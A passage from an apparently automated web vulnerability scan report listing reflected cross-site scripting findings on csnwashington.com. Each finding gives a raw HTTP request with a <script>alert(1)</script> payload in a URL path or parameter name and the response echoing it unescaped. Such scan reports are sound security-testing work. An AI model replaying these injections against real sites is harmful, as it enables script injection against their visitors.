Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:18 GMT
Content-Length: 822
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Bruins-score-3-quickly-hold-on-to-beat-C/landing.html83bb0<script>alert(1)</script>79422940834"</strong>
...[SNIP]...

2.401. http://www.csnwashington.com/12/18/10/Hanrahan-Arenas-trade-was-long-overdue/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/18/10/Hanrahan-Arenas-trade-was-long-overdue/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8acb1<script>alert(1)</script>e73e011d7b7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Hanrahan-Arenas-trade-was-long-overdue/landing.html8acb1<script>alert(1)</script>e73e011d7b7 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:12:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:06 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Hanrahan-Arenas-trade-was-long-overdue/landing.html8acb1<script>alert(1)</script>e73e011d7b7"</strong>
...[SNIP]...

2.402. http://www.csnwashington.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ec6c7<script>alert(1)</script>b553b5c0c13 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmlec6c7<script>alert(1)</script>b553b5c0c13 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:19 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmlec6c7<script>alert(1)</script>b553b5c0c13"</strong>
...[SNIP]...

2.403. http://www.csnwashington.com/12/19/10/Redskins-Cowboys-game-chat-on-now/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/19/10/Redskins-Cowboys-game-chat-on-now/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 763a2<script>alert(1)</script>4ec1fcfca34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Redskins-Cowboys-game-chat-on-now/landing.html763a2<script>alert(1)</script>4ec1fcfca34 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:25 GMT
Content-Length: 815
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Redskins-Cowboys-game-chat-on-now/landing.html763a2<script>alert(1)</script>4ec1fcfca34"</strong>
...[SNIP]...

2.404. http://www.csnwashington.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c48ff<script>alert(1)</script>94c169c9d81 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.htmlc48ff<script>alert(1)</script>94c169c9d81 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:26 GMT
Content-Length: 822
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.htmlc48ff<script>alert(1)</script>94c169c9d81"</strong>
...[SNIP]...

2.405. http://www.csnwashington.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload df301<script>alert(1)</script>d8187e7500b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.htmldf301<script>alert(1)</script>d8187e7500b HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:26 GMT
Content-Length: 822
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.htmldf301<script>alert(1)</script>d8187e7500b"</strong>
...[SNIP]...

2.406. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ddc5<script>alert(1)</script>7923811833e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common6ddc5<script>alert(1)</script>7923811833e/global_flash/player/player.php HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:22 GMT
Content-Length: 797
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common6ddc5<script>alert(1)</script>7923811833e/global_flash/player/player.php"</strong>
...[SNIP]...

2.407. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ac5d0<script>alert(1)</script>c5ac45b6811 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flashac5d0<script>alert(1)</script>c5ac45b6811/player/player.php HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:22 GMT
Content-Length: 797
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flashac5d0<script>alert(1)</script>c5ac45b6811/player/player.php"</strong>
...[SNIP]...

2.408. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d2d0<script>alert(1)</script>874f6e6b8a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player7d2d0<script>alert(1)</script>874f6e6b8a4/player.php HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:22 GMT
Content-Length: 797
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player7d2d0<script>alert(1)</script>874f6e6b8a4/player.php"</strong>
...[SNIP]...

2.409. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 380be<script>alert(1)</script>fb96cb39309 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php380be<script>alert(1)</script>fb96cb39309 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:22 GMT
Content-Length: 797
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php380be<script>alert(1)</script>fb96cb39309"</strong>
...[SNIP]...

2.410. http://www.csnwashington.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a55b<script>alert(1)</script>ecfc219d1ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/1a55b<script>alert(1)</script>ecfc219d1ac HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:16 GMT
Content-Length: 770
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/1a55b<script>alert(1)</script>ecfc219d1ac"</strong>
...[SNIP]...

2.411. http://www.csnwashington.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f92d<script>alert(1)</script>5676dba64a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2f92d<script>alert(1)</script>5676dba64a0 HTTP/1.1
Host: www.csnwashington.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:49 GMT
Connection: close
Content-Length: 760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/2f92d<script>alert(1)</script>5676dba64a0"</strong>
...[SNIP]...

2.412. http://www.csnwashington.com/pages/photos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/photos

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a8777<script>alert(1)</script>64d8dabc12e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesa8777<script>alert(1)</script>64d8dabc12e/photos HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:25 GMT
Content-Length: 772
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesa8777<script>alert(1)</script>64d8dabc12e/photos"</strong>
...[SNIP]...

2.413. http://www.csnwashington.com/pages/photos [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/photos

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc646<script>alert(1)</script>24f8353ea18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/photosbc646<script>alert(1)</script>24f8353ea18 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:26 GMT
Content-Length: 791
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/photosbc646<script>alert(1)</script>24f8353ea18"</strong>
...[SNIP]...

2.414. http://www.csnwashington.com/pages/photos [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/photos

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcdf5"><script>alert(1)</script>2a5d912f71e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/photos?bcdf5"><script>alert(1)</script>2a5d912f71e=1 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 126701
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--

-->
<meta http-equiv="Content-Type" content="text/html; charset=U
...[SNIP]...
<input type=hidden name="bcdf5"><script>alert(1)</script>2a5d912f71e" id = "bcdf5">
...[SNIP]...

2.415. http://www.csnwashington.com/pages/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cabae<script>alert(1)</script>4d73057409f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagescabae<script>alert(1)</script>4d73057409f/video HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:22 GMT
Content-Length: 771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagescabae<script>alert(1)</script>4d73057409f/video"</strong>
...[SNIP]...

2.416. http://www.csnwashington.com/pages/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49a37<script>alert(1)</script>67eec45d21f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/video49a37<script>alert(1)</script>67eec45d21f HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:23 GMT
Content-Length: 790
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/video49a37<script>alert(1)</script>67eec45d21f"</strong>
...[SNIP]...

2.417. http://www.csnwashington.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64b3"><script>alert(1)</script>a0a8bb6a52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?d64b3"><script>alert(1)</script>a0a8bb6a52=1 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 65103
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web4.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="d64b3"><script>alert(1)</script>a0a8bb6a52" id = "d64b3">
...[SNIP]...

2.418. http://www.csnwashington.com/pages/videoembed [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/videoembed

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e659<script>alert(1)</script>82e8ba31362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages7e659<script>alert(1)</script>82e8ba31362/videoembed HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:31 GMT
Content-Length: 776
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages7e659<script>alert(1)</script>82e8ba31362/videoembed"</strong>
...[SNIP]...

2.419. http://www.csnwashington.com/pages/videoembed [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/videoembed

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 16840<script>alert(1)</script>ac0aae4fb20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/videoembed16840<script>alert(1)</script>ac0aae4fb20 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:32 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/videoembed16840<script>alert(1)</script>ac0aae4fb20"</strong>
...[SNIP]...

2.420. http://www.csnwashington.com/pages/videoembed [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /pages/videoembed

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c190b"><script>alert(1)</script>920d774f729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

